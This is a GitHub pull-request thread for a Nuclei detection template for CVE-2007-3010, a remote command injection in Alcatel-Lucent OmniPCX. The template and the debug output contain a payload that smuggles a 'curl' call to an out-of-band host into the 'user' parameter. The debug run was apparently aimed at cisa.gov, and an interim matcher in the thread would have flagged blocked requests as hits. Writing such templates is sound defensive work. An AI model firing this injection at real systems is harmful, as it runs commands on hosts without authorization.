CVE-2007-3010

[king-alexander]

Template / PR Information

This is a new template for a Known Exploited Vulnerability (#7549).

• Added CVE-2007-3010
• References: https://marc.info/?l=full-disclosure&m=119002152126755&w=2

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[pussycat0x]

Hello @king-alexander I appreciate you sharing this template. If possible, could you also provide debug data? It would be very beneficial for our validation process.

[king-alexander]

Hello @king-alexander I appreciate you sharing this template. If possible, could you also provide debug data? It would be very beneficial for our validation process.

Sure! What type of debug data would be helpful?

[pussycat0x]

Hello @king-alexander , you can utilize the -debug flag to obtain debug data when executing a template
syntax:
./nuclei -u target -t CVE-2007-3010.yaml -debug

[king-alexander]

[DBG] [CVE-2007-3010] Dumped HTTP response https://cisa.gov/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://cleau9n70jngqfel87s0aefodk1mhh7o9.oast.live;

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 284
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 21 Nov 2023 13:22:49 GMT
Expires: Tue, 21 Nov 2023 13:22:49 GMT
Mime-Version: 1.0
Server: AkamaiGHost
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Reference-Error: 18.683b2f17.1700572969.4886ea5f

<HTML><HEAD>
<TITLE>Access Denied</TITLE>
</HEAD><BODY>
<H1>Access Denied</H1>

You don't have permission to access "http&#58;&#47;&#47;cisa&#46;gov&#47;cgi&#45;bin&#47;masterCGI&#63;" on this server.<P>
Reference&#32;&#35;18&#46;683b2f17&#46;1700572969&#46;4886ea5f

[pussycat0x]

Hi @king-alexander Thank you for providing debug data. I've made updates to the matchers. Could you please check if they work for you? Additionally, do you have any Shodan or FOFA dorks for this?

id: CVE-2007-3010

info:
  name: Alcatel-Lucent OmniPCX - Remote Command Execution
  author: king-alexander
  severity: high
  description: |
    The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
  impact: |
   Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
  remediation: |
    Update to supported versions that filter shell metacharacters in the "user" parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2007-3010
    - https://marc.info/?l=full-disclosure&m=119002152126755&w=2
  tags: alcatel,cve,cve2007,kev,rce

http:
  - method: GET
    path:
      # Spaces must be encoded with the internal field separator "${IFS}" to execute the command.
      - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://{{interactsh-url}};"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'Content-Type: text/html'

      - type: word
        part: body
        words:
          - "Access Denied"

      - type: status
        status:
          - 403

[king-alexander]

Thank you for the update! I don't think we want to match on 403 Forbidden response however. This vulnerability applies when the web interface is exposed. I don't have a Shodan or FOFA dork, but I imagine those would help us match on a true positive.

[DhiyaneshGeek]

Hi @king-alexander i have managed to validate this successfully at my end.

made some changes around the matcher to fix the false positive.

Thank you so much for sharing this template with the community and contributing to the template project 😄

[king-alexander]

@DhiyaneshGeek Thank you for taking the time to validate the template! I appreciate the work you've done to get this template merged 🙏